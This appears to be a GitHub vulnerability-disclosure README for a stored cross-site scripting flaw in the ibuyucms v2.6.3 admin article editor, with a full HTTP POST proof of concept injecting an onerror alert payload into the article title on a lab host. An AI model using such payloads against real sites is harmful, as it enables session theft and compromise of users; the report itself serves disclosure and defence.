Skip to content

Upgradeextension/ibuyu

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 

Repository files navigation

ibuyucms_v2.6.3 Backend Stored XSS Vulnerability

Download Link

https://zdown.chinaz.com/201410/ibuyucms_v2.6.3.zip

Impact of the Vulnerability

An attacker can exploit this vulnerability to steal sensitive user information, such as session cookies, login credentials, or personal data. Additionally, the attacker can use this vulnerability to perform other malicious actions, such as redirecting users to phishing pages, delivering malware payloads, or implanting malicious programs.

Affected Version

ibuyucms_v2.6.3

Vulnerability Description

The web application management backend of ibuyucms_v2.6.3 contains a stored XSS vulnerability. The vulnerability resides in the "Article Category Management - Add Article - Article Title" module. By injecting XSS code into the article title and saving the article, clicking the "View" button triggers a browser pop-up window, confirming the existence of the XSS vulnerability. image image image

Vulnerability Analysis

In the file /admin/article.php, the title field does not perform regular filtering on the input parameters. The backend fails to filter or escape HTML tags in the user-submitted title, allowing users to directly submit content containing dangerous attributes such as <script> and onerror. By adding malicious XSS statements to the parameters in the request, the vulnerability can be successfully exploited. image

Vulnerability Verification Process

POST /ibuyu//admin/article.php?a=mod&id=10 HTTP/1.1
Host: 10.211.55.3
Content-Length: 250
Cache-Control: max-age=0
Origin: http://10.211.55.3
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.211.55.3/ibuyu//admin/article.php?a=mod&id=10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9vr1t6lb3mohb3vqbupeqvej07; __51cke__=; __tins__17370478=%7B%22sid%22%3A%201756968140759%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201756969940759%7D; __51laig__=5
Connection: close

fid=2&title=%E6%B5%8B%E8%AF%9522222<img src=1 onerror=alert(/xss/)>222&shorttitle=1&writer=%E7%AE%A1%E7%90%86%E5%91%98&tag=&keywords=%E6%B5%8B%E8%AF%95&description=111111111111&remote=1&autolitpic=1&content=1111111111&img=&ischeck=1&into_wz=%E4%BF%AE%E6%94%B9&id=10&oldtag=&a=mod_do
image

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors